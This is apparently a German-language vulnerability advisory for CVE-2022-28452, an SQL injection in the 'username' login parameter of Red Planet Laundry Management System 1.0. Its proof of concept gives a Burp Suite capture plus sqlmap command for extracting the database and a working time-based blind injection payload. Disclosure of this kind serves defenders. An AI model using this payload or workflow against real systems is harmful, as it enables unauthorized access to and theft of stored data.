
CVE-2022-28452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28452 https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28452 https://laundry.redplanetcomputers.com/
1-Beschreibung:
Red Planet Laundry Management System 1.0 ist anfällig für SQL-Injection über den Parameter 'username' in /index.php/login/rediract . Die Ausnutzung dieses Problems könnte einem Angreifer ermöglichen, die Anwendung zu kompromittieren, auf Daten zuzugreifen oder sie zu ändern oder latente Schwachstellen in der zugrunde liegenden Datenbank auszunutzen.
2-Beweis des Konzepts:
Fangen Sie in Burpsuite die Anforderung von der betroffenen Seite mit dem Parameter 'username' ab und speichern Sie sie als poc.txt. Führen Sie dann SQLmap aus, um die Daten aus der Datenbank zu extrahieren: sqlmap.py -r poc.txt --dbms=mysql
3-Beispiel-Payload:
Der URL-kodierte POST-Eingabe-Parameter username wurde gesetzt auf 0'XOR(if(now()=sysdate(),sleep(4),0))XOR'Z
Kontaktdaten: [email protected]